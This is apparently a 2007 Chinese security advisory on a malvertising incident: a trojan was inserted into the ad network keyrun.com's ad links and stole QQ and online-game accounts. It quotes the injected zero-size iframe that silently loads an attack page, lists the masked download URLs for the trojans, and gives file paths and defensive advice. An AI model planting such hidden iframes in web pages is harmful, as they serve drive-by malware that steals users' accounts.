出处：DSW Avert 时间：2007年03月25日

一、事件分析：

今日，DSW Lab Avert小组监测到网络广告商麒润网(keyrun.com)，其提供的广告链接中被插入木马，麒润网的用户和合作伙伴会在网页中插入类似如下的代码来增加广告条：

;//<script>document.write('<iframe src="http://u.keyrun.com/k.html?id=1111" marginheight=0 marginwidth=0 frameborder=0 scrolling=no height="60" width="468" ></iframe>');</script>

在该被引用的广告条中，被嵌入<iframe src=指令，打开一个恶意网站 http://*****.cn/admin/help.htm width=0 height=0 frameborder=0></iframe>

该页面利用IE漏洞下载了一个名为HELP.EXE的文件，为：Trojan-PSW.Win32.Delf.qc

该木马被下载执行后，但从同一个网站http://*****.cn下载更多的木马运行。如下：

http://*****.cn/template/basic/gg.exe
http://*****.cn/template/basic/zz.exe
http://*****.cn/template/basic/gm.exe
http://*****.cn/template/basic/wl.exe
http://*****.cn/template/basic/mh.exe

木马运行后，将监视用户系统，窃取用户的QQ账号/网游账号等。

二、木马分析：

在该链下载生成的木马文件高达20多个：

文件：gg.exe 病毒：Trojan-PSW.Win32.OnLineGames.jj
文件：gm.exe 病毒：Trojan-PSW.Win32.OnLineGames.jj
文件：help.exe 病毒：Trojan-PSW.Win32.Delf.qc
文件：mh.exe 病毒：Trojan-PSW.Win32.OnLineGames.jj
文件：ms.exe 病毒：Trojan-PSW.Win32.OnLineGames.es
文件：avp.exe 病毒：Trojan-PSW.Win32.OnLineGames.ez
文件：cmdbcs.dll 病毒：Trojan-PSW.Win32.OnLineGames.lc
文件：cmdbcs.exe 病毒：Trojan-PSW.Win32.OnLineGames.lc
文件：iexpl0re.exe 病毒：Trojan-PSW.Win32.OnLineGames.jl
文件：ldmedia3.dll 病毒：Trojan-PSW.Win32.OnLineGames.aa
文件：LgSy0.dll 病毒：Trojan-PSW.Win32.OnLineGames.ez
文件：mppds.dll 病毒：trojan-PSW.Win32.OnLineGames.es
文件：mppds.exe 病毒：trojan-PSW.Win32.OnLineGames.ea
文件：qq.exe 病毒：Trojan-PSW.Win32.OnLineGames.ed
文件：system2.jmp 病毒：Trojan-PSW.Win32.OnLineGames.es
文件：system2.jmp 病毒：Trojan-PSW.Win32.OnLineGames.ec
文件：SystemKb.sys 病毒：Trojan-PSW.Win32.OnLineGames.ej
文件：upxdnd.dll 病毒：Trojan-PSW.Win32.OnLineGames.jj
文件：wsttrs.dll 病毒：trojan-PSW.Win32.OnLineGames.es
文件：wsttrs.exe 病毒：Trojan-PSW.Win32.OnLineGames.jj
文件：zz.exe 病毒：Trojan-PSW.Win32.OnLineGames.ek
文件：Ghook.dll 病毒：Trojan-PSW.Win32.OnLineGames.ea
文件：svchost.exe 病毒：Trojan-PSW.Win32.OnLineGames.ec

木马主要存在路径： 文件大小 属性 日期
%SystemDrive%\Syswm1h\Ghook.dll 28KB HSA 2007-3-25 11:19:09
%SystemDrive%\Syswm1h\svchost.exe 15KB HSA 2007-3-25 11:19:09
%USERPROFILE%\Local Settings\Temp\iexpl0re.exe 19KB A 2002-12-31 20:00:00
%USERPROFILE%\Local Settings\Temp\LgSy0.dll 25KB A 2002-12-31 20:00:00
%USERPROFILE%\Local Settings\Temp\qq.exe 27KB A 2007-3-25 11:18:30
%USERPROFILE%\Local Settings\Temp\upxdnd.dll 12KB A 2007-3-25 11:18:30
%USERPROFILE%\Local Settings\Temp\zz.exe 19KB A 2007-3-25 11:18:30
%ProgramFiles%\Internet Explorer\PLUGINS\system2.jmp 7KB HS 2007-3-25 11:18:30
%ProgramFiles%\Internet Explorer\PLUGINS\SystemKb.sys 36KB HSA 2007-3-25 11:18:30
%SystemRoot%\avp.exe 35KB A 2004-8-16 16:39:20
%SystemRoot%\cmdbcs.exe 17KB A 2007-3-25 11:18:30
%SystemRoot%\mppds.exe 18KB A 2007-3-25 11:18:30
%SystemRoot%\wsttrs.exe 15KB A 2007-3-25 11:18:30
%SystemRoot%\system32\cmdbcs.dll 10KB A 2007-3-25 11:18:30
%SystemRoot%\system32\ldmedia3.dll 213KB A 1617-12-12 7:49:48
%SystemRoot%\system32\mppds.dll 11KB A 2007-3-25 11:18:30
%SystemRoot%\system32\wsttrs.dll 9KB A 2007-3-25 11:18:30

目前，挂马者比较倾向使用类似广告链/推广链/统计链方式，这样可以有着极大的覆盖面，请使用类似业务系统的网站站长注意这些第三方服务的安全。

三、解决方案：

1、推荐安装超级巡警监测查杀以上木马。
2、请广大用户及时升级系统补丁，预防更多的IE漏洞攻击。
3、为了最快保障广大用户不受木马侵害，在事件解决前请暂时不要访问使用该广告服务的网站。

关于麒润广告网(引自官方)：
麒润广告网在Alexa.com世界排名长期保持在世界二百名左右，当前拥有会员五千多家，并以每天50名网站会员速度不断增长。